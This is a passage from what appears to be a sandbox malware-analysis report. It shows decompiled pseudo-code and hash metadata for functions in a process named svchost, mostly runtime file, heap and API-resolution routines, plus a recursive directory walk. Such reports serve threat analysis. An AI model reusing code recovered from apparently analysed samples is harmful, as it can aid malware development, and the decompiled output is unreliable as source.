                            					if(_t14 < 1) {
                            						goto L5;
                            					} else {
                            						while(1) {
                            							_t17 = E00BC9780(0xbe0340, _t35, 8);
                            							_t43 = _t43 + 0xc;
                            							if(_t17 == 0) {
                            								break;
                            							}
                            							_t35 = _t35 - 1;
                            							_t14 =  &_v100;
                            							if(_t35 >= _t14) {
                            								continue;
                            							} else {
                            								goto L5;
                            							}
                            							goto L7;
                            						}
                            						asm("movups xmm0, [esi]");
                            						asm("movups [edi+0x10], xmm0");
                            						asm("movups xmm0, [esi+0x10]");
                            						asm("movups [edi+0x20], xmm0");
                            						asm("movups xmm0, [esi+0x20]");
                            						asm("movups [edi+0x30], xmm0");
                            						asm("movups xmm0, [esi+0x30]");
                            						asm("movups [edi+0x40], xmm0");
                            						asm("movups xmm0, [esi+0x40]");
                            						asm("movups [edi+0x50], xmm0");
                            						asm("movq xmm0, [esi+0x50]");
                            						asm("movq [edi+0x60], xmm0");
                            						_push( *((intOrPtr*)(_t31 + 0x18)));
                            						L00BC7864();
                            						 *((intOrPtr*)(_t31 + 4)) = _t35 -  &_v104 + _t21 - _t17 + 0x58;
                            						E00BC786A();
                            						return 0;
                            					}
                            				}
                            				L7:
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __fread_nolockhtonl
                            • String ID:
                            • API String ID: 822407656-0
                            • Opcode ID: 97bbcec2b5d3a7bbfad269f17599036ca15f58a2a9f729a2676a345977fc263a
                            • Instruction ID: 1e82537b5a56d4b96169fa9a5473ff706fd661c50897dbb97d0780f7f272d75a
                            • Opcode Fuzzy Hash: 97bbcec2b5d3a7bbfad269f17599036ca15f58a2a9f729a2676a345977fc263a
                            • Instruction Fuzzy Hash: B121F232E04B41A7D2149B398C02BA6F3E0FFA8304F809B1DF99862642FB21F5D4C681
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E00BD3587(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
                            				struct HINSTANCE__* _t13;
                            				signed int* _t20;
                            				signed int _t27;
                            				signed int _t28;
                            				signed int _t29;
                            				signed int _t33;
                            				intOrPtr* _t34;
                            
                            				_t20 = 0xbf6368 + _a4 * 4;
                            				_t27 =  *0xbec008; // 0xdc55bb75
                            				_t29 = _t28 | 0xffffffff;
                            				_t33 = _t27 ^  *_t20;
                            				asm("ror esi, cl");
                            				if(_t33 == _t29) {
                            					L14:
                            					return 0;
                            				}
                            				if(_t33 == 0) {
                            					_t34 = _a12;
                            					if(_t34 == _a16) {
                            						L7:
                            						_t13 = 0;
                            						L8:
                            						if(_t13 == 0) {
                            							L13:
                            							_push(0x20);
                            							asm("ror edi, cl");
                            							 *_t20 = _t29 ^ _t27;
                            							goto L14;
                            						}
                            						_t33 = GetProcAddress(_t13, _a8);
                            						if(_t33 == 0) {
                            							_t27 =  *0xbec008; // 0xdc55bb75
                            							goto L13;
                            						}
                            						 *_t20 = E00BC9353(_t33);
                            						goto L2;
                            					} else {
                            						goto L4;
                            					}
                            					while(1) {
                            						L4:
                            						_t13 = E00BD3623( *_t34); // executed
                            						if(_t13 != 0) {
                            							break;
                            						}
                            						_t34 = _t34 + 4;
                            						if(_t34 != _a16) {
                            							continue;
                            						}
                            						_t27 =  *0xbec008; // 0xdc55bb75
                            						goto L7;
                            					}
                            					_t27 =  *0xbec008; // 0xdc55bb75
                            					goto L8;
                            				}
                            				L2:
                            				return _t33;
                            			}

                            APIs
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00BD35E7
                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BD35F4
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: AddressProc__crt_fast_encode_pointer
                            • String ID:
                            • API String ID: 2279764990-0
                            • Opcode ID: b3c64d6df186e90c410f53bde9dc9d1b9e8794d10a7c4d690caf467480824bd0
                            • Instruction ID: f79a430bcbfbd2962356af433e8ec10280751cea912a06e02643e20ede41f5da
                            • Opcode Fuzzy Hash: b3c64d6df186e90c410f53bde9dc9d1b9e8794d10a7c4d690caf467480824bd0
                            • Instruction Fuzzy Hash: 86115C33A042249B9F21DF18EC8195AB7D1EB80B2471702A1FC1AAF346EF30DE4187D2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E00BCE4A6(void* __edx, FILETIME* _a4) {
                            				signed int _v8;
                            				struct _SYSTEMTIME _v24;
                            				struct _SYSTEMTIME _v40;
                            				signed int _t14;
                            				FILETIME* _t16;
                            				signed int _t17;
                            				void* _t26;
                            				void* _t30;
                            				void* _t32;
                            				signed int _t33;
                            
                            				_t30 = __edx;
                            				_t14 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t14 ^ _t33;
                            				_t16 = _a4;
                            				if(_t16->dwLowDateTime != 0 || _t16->dwHighDateTime != 0) {
                            					_t16 = FileTimeToSystemTime(_t16,  &_v40);
                            					if(_t16 == 0) {
                            						goto L2;
                            					} else {
                            						_t16 = SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24); // executed
                            						if(_t16 == 0) {
                            							goto L2;
                            						} else {
                            							_push(0xffffffff);
                            							_push(_v24.wSecond & 0x0000ffff);
                            							_t17 = E00BD56B5(_t26, _t30, _t32, _v24.wYear & 0x0000ffff, _v24.wMonth & 0x0000ffff, _v24.wDay & 0x0000ffff, _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff); // executed
                            						}
                            					}
                            				} else {
                            					L2:
                            					_t17 = _t16 | 0xffffffff;
                            				}
                            				E00BC786A();
                            				return _t17;
                            			}

                            APIs
                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00BCE328,?), ref: 00BCE4D2
                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,00BCE328,?,?,?,?,00BCE328,?), ref: 00BCE4E6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Time$System$FileLocalSpecific
                            • String ID:
                            • API String ID: 1707611234-0
                            • Opcode ID: 249f17ce7ce2f285d0abf4875515e3aca084a0482fb92a7d14843a98d9475ebd
                            • Instruction ID: aafb46127e9a59cf7dc20b3706207cb7b52d016995556662ac36c35b8cf71e65
                            • Opcode Fuzzy Hash: 249f17ce7ce2f285d0abf4875515e3aca084a0482fb92a7d14843a98d9475ebd
                            • Instruction Fuzzy Hash: DD010561900119AACB24DBA58945FBEB7FCEF08721F504299B959E7180EA78DE80D770
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00BC9FC9(signed int __edx, intOrPtr* _a4) {
                            				char _v5;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _t64;
                            				signed int _t66;
                            				signed char _t68;
                            				signed int _t70;
                            				signed char _t77;
                            				intOrPtr* _t78;
                            				signed int _t79;
                            				signed char _t80;
                            				intOrPtr _t82;
                            				intOrPtr _t83;
                            				signed int _t90;
                            				intOrPtr _t93;
                            				signed int _t94;
                            				intOrPtr* _t95;
                            				signed char _t96;
                            				signed int _t99;
                            				signed int _t100;
                            				signed int _t103;
                            				signed int _t109;
                            				signed int _t111;
                            				signed int _t113;
                            				signed int _t114;
                            				signed int _t115;
                            				signed int _t118;
                            				signed int _t120;
                            
                            				_t104 = __edx;
                            				if(_a4 != 0) {
                            					_t64 = E00BD09C5(_a4);
                            					_t93 = _a4;
                            					_t118 = _t64;
                            					__eflags =  *(_t93 + 8);
                            					if( *(_t93 + 8) < 0) {
                            						 *(_t93 + 8) = 0;
                            					}
                            					_t66 = E00BD27EC(_t118, 0, 0, 1); // executed
                            					_t90 = _t104;
                            					_t109 = _t66;
                            					_v12 = _t109;
                            					__eflags = _t90;
                            					if(__eflags > 0) {
                            						L7:
                            						_t68 =  *(_a4 + 0xc);
                            						__eflags = _t68 & 0x000000c0;
                            						if((_t68 & 0x000000c0) != 0) {
                            							_t70 = _t118 >> 6;
                            							_t94 = (_t118 & 0x0000003f) * 0x30;
                            							_v16 = _t70;
                            							_v20 = _t94;
                            							_t95 = _a4;
                            							_v5 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(0xbf6108 + _t70 * 4)) + 0x29));
                            							_t96 =  *(_t95 + 0xc);
                            							asm("cdq");
                            							_t120 =  *_t95 -  *((intOrPtr*)(_t95 + 4));
                            							__eflags = _t96 & 0x00000003;
                            							if((_t96 & 0x00000003) == 0) {
                            								_t77 =  *(_a4 + 0xc) >> 2;
                            								__eflags = _t77 & 0x00000001;
                            								if((_t77 & 0x00000001) != 0) {
                            									L23:
                            									_t78 = _a4;
                            									L24:
                            									__eflags = _t109 | _t90;
                            									if((_t109 | _t90) == 0) {
                            										L30:
                            										_t79 = _t120;
                            										goto L31;
                            									}
                            									_t80 =  *(_t78 + 0xc);
                            									__eflags = _t80 & 0x00000001;
                            									if((_t80 & 0x00000001) == 0) {
                            										__eflags = _v5 - 1;
                            										if(_v5 == 1) {
                            											_t120 = E00BC7AE0(_t120, _t104, 2, 0);
                            										}
                            										_t120 = _t120 + _t109;
                            										asm("adc edx, ebx");
                            										goto L30;
                            									}
                            									_t79 = E00BCA15E(_a4, _t109, _t90, _t120, _t104);
                            									goto L31;
                            								}
                            								_t66 = E00BCC9CE();
                            								 *_t66 = 0x16;
                            								goto L22;
                            							}
                            							__eflags = _v5 - 1;
                            							_t99 = _v16;
                            							if(_v5 != 1) {
                            								L13:
                            								_t82 =  *((intOrPtr*)(0xbf6108 + _t99 * 4));
                            								_t100 = _v20;
                            								__eflags =  *(_t100 + _t82 + 0x28) & 0x00000080;
                            								if(( *(_t100 + _t82 + 0x28) & 0x00000080) == 0) {
                            									goto L23;
                            								}
                            								_t78 = _a4;
                            								_v20 = _v20 & 0x00000000;
                            								_t111 =  *(_t78 + 4);
                            								__eflags =  *_t78 - _t111;
                            								asm("sbb edi, edi");
                            								_t113 =  !_t111 &  *_t78 -  *(_t78 + 4);
                            								__eflags = _t113;
                            								_v16 = _t113;
                            								_t109 = _v12;
                            								if(_t113 == 0) {
                            									goto L24;
                            								}
                            								_t103 =  *(_t78 + 4);
                            								_t114 = _v20;
                            								do {
                            									__eflags =  *_t103 - 0xa;
                            									if( *_t103 == 0xa) {
                            										_t120 = _t120 + 1;
                            										asm("adc edx, 0x0");
                            									}
                            									_t103 = _t103 + 1;
                            									_t114 = _t114 + 1;
                            									__eflags = _t114 - _v16;
                            								} while (_t114 != _v16);
                            								_t109 = _v12;
                            								goto L24;
                            							}
                            							_t115 = _v20;
                            							_t83 =  *((intOrPtr*)(0xbf6108 + _t99 * 4));
                            							__eflags =  *(_t115 + _t83 + 0x2d) & 0x00000002;
                            							_t109 = _v12;
                            							if(( *(_t115 + _t83 + 0x2d) & 0x00000002) == 0) {
                            								goto L13;
                            							}
                            							_t79 = E00BCA2E2(_a4, _t109, _t90);
                            							goto L31;
                            						}
                            						asm("cdq");
                            						_t79 = _t109 -  *((intOrPtr*)(_a4 + 8));
                            						asm("sbb ebx, edx");
                            						goto L31;
                            					} else {
                            						if(__eflags < 0) {
                            							L22:
                            							_t79 = _t66 | 0xffffffff;
                            							L31:
                            							return _t79;
                            						}
                            						__eflags = _t109;
                            						if(_t109 < 0) {
                            							goto L22;
                            						}
                            						goto L7;
                            					}
                            				}
                            				 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            				return E00BD1788() | 0xffffffff;
                            			}

                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d1fc46791b9e3200a6fce7744e3afeebe35c6002caad1449ffb62de4669e78d
                            • Instruction ID: 06f90de71917399901a4da8fb41af17769d9c45d04c9d0061b4bc8f9ee6dd2e4
                            • Opcode Fuzzy Hash: 0d1fc46791b9e3200a6fce7744e3afeebe35c6002caad1449ffb62de4669e78d
                            • Instruction Fuzzy Hash: 2B51A331A00108AFDB10DF58CC45FA97BE1EB86368F1981DCE859AB392C731ED42CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E00BD5E01(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
                            				char _v8;
                            				char _v12;
                            				void* _v16;
                            				intOrPtr _v20;
                            				char _v32;
                            				void* _t25;
                            
                            				E00BD5BBD( &_v32, _a8);
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				if(_v12 != 0) {
                            					_t25 = E00BDC048( &_v8, _a4, _v20, _a12, 0x180); // executed
                            					if(_t25 != 0) {
                            						goto L1;
                            					}
                            					 *0xbf5e8c =  *0xbf5e8c + 1;
                            					asm("lock or [eax], ecx");
                            					 *((intOrPtr*)(_a16 + 8)) = 0;
                            					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
                            					 *((intOrPtr*)(_a16 + 4)) = 0;
                            					 *_a16 = 0;
                            					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
                            					return _a16;
                            				}
                            				L1:
                            				return 0;
                            			}










                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: 28979cc709d8941b9c4d28f71ba508f7fcaafc182ec92faab910ec3ddf5a8fc4
                            • Instruction ID: 4749c0ad2d4d7a32950f73a485365c86cc4aa61e214a628b243b54308546b5e9
                            • Opcode Fuzzy Hash: 28979cc709d8941b9c4d28f71ba508f7fcaafc182ec92faab910ec3ddf5a8fc4
                            • Instruction Fuzzy Hash: 0711187190410AAFCF15DF58E94199B7BF4EF49310F10449AF808AB311E671DA25CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00BC9813(void* __ecx, intOrPtr _a4) {
                            				signed int _t13;
                            				void* _t16;
                            				void* _t24;
                            				signed int _t25;
                            				signed int _t26;
                            				intOrPtr _t28;
                            
                            				_t28 = _a4;
                            				if(_t28 == 0) {
                            					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
                            					return E00BD1788() | 0xffffffff;
                            				}
                            				_push(_t25);
                            				_t26 = _t25 | 0xffffffff;
                            				if(( *(_t28 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
                            					_t13 = E00BCDA31(_t24, _t28); // executed
                            					_t26 = _t13; // executed
                            					E00BD1AED(_t28); // executed
                            					_t16 = E00BD1875(E00BD09C5(_t28)); // executed
                            					if(_t16 >= 0) {
                            						if( *(_t28 + 0x1c) != 0) {
                            							E00BD09EB( *(_t28 + 0x1c));
                            							 *(_t28 + 0x1c) =  *(_t28 + 0x1c) & 0x00000000;
                            						}
                            					} else {
                            						_t26 = _t26 | 0xffffffff;
                            					}
                            				}
                            				E00BD19EF(_t28);
                            				return _t26;
                            			}










                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 53c0432bc4066464975b7a767e5d6c557e3d0b8557d8d6721c8e5e377a26fd3c
                            • Instruction ID: 3ec6ac1e0fac62b92dd238b78566d40616af34fe1b7c88307c26b85daa2e9e91
                            • Opcode Fuzzy Hash: 53c0432bc4066464975b7a767e5d6c557e3d0b8557d8d6721c8e5e377a26fd3c
                            • Instruction Fuzzy Hash: F6F0283250261067EB21766DDC09F5B76D88F433B0F110B9EF565D33D2EB74D80286A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E00BD0A25(void* __ecx, long _a4) {
                            				void* _t4;
                            				void* _t6;
                            				void* _t7;
                            				long _t8;
                            
                            				_t7 = __ecx;
                            				_t8 = _a4;
                            				if(_t8 > 0xffffffe0) {
                            					L7:
                            					 *((intOrPtr*)(E00BCC9CE())) = 0xc;
                            					__eflags = 0;
                            					return 0;
                            				}
                            				if(_t8 == 0) {
                            					_t8 = _t8 + 1;
                            				}
                            				while(1) {
                            					_t4 = RtlAllocateHeap( *0xbf655c, 0, _t8); // executed
                            					if(_t4 != 0) {
                            						break;
                            					}
                            					__eflags = E00BD0397();
                            					if(__eflags == 0) {
                            						goto L7;
                            					}
                            					_t6 = E00BD8686(_t7, __eflags, _t8);
                            					_pop(_t7);
                            					__eflags = _t6;
                            					if(_t6 == 0) {
                            						goto L7;
                            					}
                            				}
                            				return _t4;
                            			}








                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BD80E5,00000000,?,00BD0C3C,?,00000008,?,00BD3E2E,?,?,?), ref: 00BD0A57
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: a94c0d1722b9ee60513cf81ff523a204f42eb135c3d025b757bb5d1c4aa48ab0
                            • Instruction ID: abbe7ee90eb8a613d90e803bd379c729d9b46f233e840c364db4ce40e913425b
                            • Opcode Fuzzy Hash: a94c0d1722b9ee60513cf81ff523a204f42eb135c3d025b757bb5d1c4aa48ab0
                            • Instruction Fuzzy Hash: 91E0E52212172196D621B665AC45B5AFAD8DF413B0F2511D3FC49A73C0FE60CD00C2A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E00BD1AED(intOrPtr* _a4) {
                            				signed char _t11;
                            				unsigned int* _t17;
                            				intOrPtr* _t18;
                            
                            				_t18 = _a4;
                            				_t17 = _t18 + 0xc;
                            				_t11 =  *_t17 >> 0xd;
                            				if((_t11 & 0x00000001) != 0) {
                            					_t11 =  *_t17 >> 6;
                            					if((_t11 & 0x00000001) != 0) {
                            						E00BD09EB( *((intOrPtr*)(_t18 + 4))); // executed
                            						asm("lock and [edi], eax");
                            						 *((intOrPtr*)(_t18 + 4)) = 0;
                            						 *_t18 = 0;
                            						 *((intOrPtr*)(_t18 + 8)) = 0;
                            						return 0;
                            					}
                            				}
                            				return _t11;
                            			}







                            APIs
                            • _free.LIBCMT ref: 00BD1B0F
                              • Part of subcall function 00BD09EB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFreeHeapLast_free
                            • String ID:
                            • API String ID: 1353095263-0
                            • Opcode ID: ba0eaaabaece19fd87c933251771ca8d68957359310cc235be6b375e1344e05b
                            • Instruction ID: b1ddf7891d2aa927720edd7bb6806f40d726b3a8ca20561b5e05af0b2614a8b5
                            • Opcode Fuzzy Hash: ba0eaaabaece19fd87c933251771ca8d68957359310cc235be6b375e1344e05b
                            • Instruction Fuzzy Hash: DAE092761113059F8720CF6DD400A86F7E4EF95721720892BE89DD3710E331E812CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BDBA5E(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
                            				void* _t10;
                            
                            				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
                            				return _t10;
                            			}





                            APIs
                            • CreateFileW.KERNELBASE(00000000,00000000,?,00BDBDC8,?,?,00000000,?,00BDBDC8,00000000,0000000C), ref: 00BDBA7B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 0f0379c88d42d7e089d2f871db34dca2536e7dac28ce646b8e42097dde967d91
                            • Instruction ID: e6c2dc39c6a3e5e5a840c712e2216bd12e6a74069c8087d7a4322ccfe7085d00
                            • Opcode Fuzzy Hash: 0f0379c88d42d7e089d2f871db34dca2536e7dac28ce646b8e42097dde967d91
                            • Instruction Fuzzy Hash: 1DD06C3201014DBBDF029F84ED46EDA3BAAFB48714F014100BA1856020C776E861AB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 54%
                            			E00BC40E0(void* __edx, char* _a4, void _a560, char _a596, char _a1120, char _a9320, char _a13424, signed int _a21628) {
                            				void _v0;
                            				void* _v4;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t57;
                            				signed int _t62;
                            				char _t63;
                            				signed int _t64;
                            				intOrPtr _t65;
                            				char _t66;
                            				void* _t69;
                            				void* _t71;
                            				void* _t73;
                            				void* _t76;
                            				signed int _t79;
                            				signed int _t80;
                            				void* _t82;
                            				signed int _t83;
                            				signed int _t84;
                            				void _t86;
                            				void _t87;
                            				void* _t90;
                            				void* _t91;
                            				intOrPtr _t98;
                            				char _t99;
                            				char* _t101;
                            				signed int _t103;
                            				short _t105;
                            				void* _t106;
                            				char* _t113;
                            				intOrPtr* _t114;
                            				signed int _t116;
                            				void* _t121;
                            				signed int _t122;
                            				void* _t123;
                            				intOrPtr* _t126;
                            				void* _t135;
                            				intOrPtr* _t141;
                            				void* _t142;
                            				signed int _t146;
                            				signed int _t147;
                            				void* _t148;
                            				void* _t149;
                            				void* _t151;
                            				void* _t153;
                            				void* _t154;
                            				void* _t156;
                            
                            				_t121 = __edx;
                            				_t147 = _t146 & 0xfffffff8;
                            				E00BC7880();
                            				_t57 =  *0xbec008; // 0xdc55bb75
                            				_a21628 = _t57 ^ _t147;
                            				_push(_t142);
                            				E00BC4BF0( &_a13424, _a4, 0x1000);
                            				_t148 = _t147 + 0xc;
                            				_t105 = 0;
                            				goto L1;
                            				do {
                            					L3:
                            					_t63 =  *_t101;
                            					_t101 = _t101 + 2;
                            				} while (_t63 != 0);
                            				_t103 = _t101 - _t106 >> 1;
                            				_t64 =  *(_t148 + 0x46e + _t103 * 2) & 0x0000ffff;
                            				if(_t64 == 0x2f || _t64 == 0x5c) {
                            					L9:
                            					_t126 =  &_a1120 + 0xfffffffe;
                            					do {
                            						_t65 =  *((intOrPtr*)(_t126 + 2));
                            						_t126 = _t126 + 2;
                            					} while (_t65 != 0);
                            					_t66 = "*"; // 0x2a
                            					 *_t126 = _t66;
                            					_push( &_v0);
                            					_t69 = E00BCE54C(_t103, _t121, _t126, _t142,  &_a1120); // executed
                            					_t149 = _t148 + 8;
                            					_v4 = _t69;
                            					if(_t69 == 0xffffffff) {
                            						L40:
                            						_t71 = E00BCE238( &_a13424); // executed
                            						E00BC786A();
                            						return _t71;
                            					}
                            					_t151 = _t149 - 0x230;
                            					_t73 = memcpy(_t151,  &_v0, 0x8c << 2);
                            					_push(_t103);
                            					_push(_t73);
                            					E00BC45C0();
                            					_push( &_v0);
                            					_t76 = E00BCE557(_t103, _t121,  &_v0, _v4); // executed
                            					_t153 = _t151 + 0x24c;
                            					if(_t76 != 0) {
                            						L39:
                            						E00BCE526(_v4);
                            						_t149 = _t153 + 4;
                            						goto L40;
                            					}
                            					do {
                            						_t145 =  &_v0;
                            						memcpy( &_a560,  &_v0, 0x8c << 2);
                            						_t154 = _t153 + 0xc;
                            						_t113 = ".";
                            						_t79 =  &_a596;
                            						while(1) {
                            							_t122 =  *_t79;
                            							if(_t122 !=  *_t113) {
                            								break;
                            							}
                            							if(_t122 == 0) {
                            								L19:
                            								_t80 = 0;
                            								L21:
                            								if(_t80 == 0) {
                            									goto L38;
                            								}
                            								_t83 = L"..";
                            								_t114 =  &_a596;
                            								while(1) {
                            									_t122 =  *_t114;
                            									if(_t122 !=  *_t83) {
                            										break;
                            									}
                            									if(_t122 == 0) {
                            										L27:
                            										_t84 = 0;
                            										L29:
                            										if(_t84 == 0) {
                            											goto L38;
                            										}
                            										_t123 =  &_a596;
                            										 *((short*)(_t154 + 0x470 + _t103 * 2)) = 0;
                            										_t145 = _t123;
                            										do {
                            											_t86 =  *_t123;
                            											_t123 = _t123 + 2;
                            										} while (_t86 != 0);
                            										_t122 = _t123 - _t145;
                            										_t135 =  &_a1120 + 0xfffffffe;
                            										do {
                            											_t87 =  *(_t135 + 2);
                            											_t135 = _t135 + 2;
